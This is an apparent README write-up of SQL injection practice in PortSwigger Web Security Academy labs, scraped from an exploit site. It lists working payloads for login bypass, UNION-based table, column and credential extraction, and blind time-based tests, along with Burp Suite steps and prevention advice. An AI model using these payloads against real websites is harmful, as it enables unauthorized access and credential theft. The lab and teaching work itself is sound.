## https://sploitus.com/exploit?id=EFBAB6E5-C4ED-5799-988B-C8C8D55B0B53
# ๐ SQL Injection Attack Lab โ PortSwigger Web Security Academy
This repository documents my hands-on practice of exploiting SQL Injection vulnerabilities using PortSwigger Web Security Academy. It demonstrates how improper input handling can lead to serious database compromise.
---
## ๐ Overview
SQL Injection (SQLi) is a vulnerability that allows attackers to manipulate SQL queries by injecting malicious input. This can lead to authentication bypass, data leakage, and full database compromise.
This project covers authentication bypass, database enumeration (tables and columns), credential extraction, and HTTP request manipulation using Burp Suite.
---
## โ ๏ธ Root Cause of SQL Injection
SQL Injection occurs when user input is directly included in SQL queries without proper validation or sanitization.
### Vulnerable Query Example
SELECT * FROM users WHERE username = 'input' AND password = 'input';
### Malicious Input
' OR '1'='1
### Resulting Query
SELECT * FROM users WHERE username = '' OR '1'='1';
This condition always evaluates to TRUE, allowing authentication bypass.
---
## ๐ ๏ธ Tools Used
- Burp Suite (Proxy, Repeater, Intruder)
- Web Browser
- PortSwigger Web Security Academy
---
## ๐ Using Burp Suite as Proxy
Burp Suite acts as an intermediary between the browser and the server.
### Steps Performed
1. Configure browser to use Burp Proxy
2. Intercept HTTP requests
3. Send to Repeater
4. Modify parameters (inject payloads)
5. Analyze responses
---
## ๐งช SQL Injection Attacks Performed
### ๐ Authentication Bypass
Payload:
' OR 1=1--
Explanation:
Injected payload into login fields to bypass authentication.
---
### ๐ Extracting Database Tables
Payload:
' UNION SELECT table_name, NULL FROM information_schema.tables--
Explanation:
Enumerated tables and identified sensitive tables like users.
---
### ๐ Extracting Column Names
Payload:
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users'--
Explanation:
Retrieved column names such as username and password.
---
### ๐ Extracting Credentials
Payload:
' UNION SELECT username, password FROM users--
Explanation:
Extracted admin credentials.
---
### ๐ HTTP Request Interception
Explanation:
Captured and modified HTTP requests using Burp Suite.
---
## ๐ง Data Extraction Capabilities
- Database names
- Table names
- Column names
- User credentials
- Sensitive data
---
## โ ๏ธ Mistakes in Prepared Statements
Incorrect:
String query = "SELECT * FROM users WHERE username = '" + user + "'";
Correct:
PreparedStatement stmt = conn.prepareStatement("SELECT * FROM users WHERE username = ?");
stmt.setString(1, user);
---
## ๐ก๏ธ Prevention Techniques
- Parameterized queries
- Input validation
- Least privilege
- ORM frameworks
- WAF
---
## ๐ Blind SQL Injection (Overview)
Types:
- Boolean-based
- Time-based
Payloads:
' AND 1=1--
' AND 1=2--
' AND SLEEP(5)--
---
## ๐ฃ Cluster Bomb Attack (Burp Intruder)
Steps:
1. Send request to Intruder
2. Mark positions
3. Add payload sets
4. Select Cluster Bomb
5. Analyze responses
---
## ๐ Key Learnings
- SQL Injection = full database compromise
- Small mistakes = big impact
- Burp Suite is essential
- Secure coding is critical
---
## โ ๏ธ Disclaimer
All testing performed in PortSwigger Web Security Academy labs for educational purposes only.
is it ok to add this as single in readme?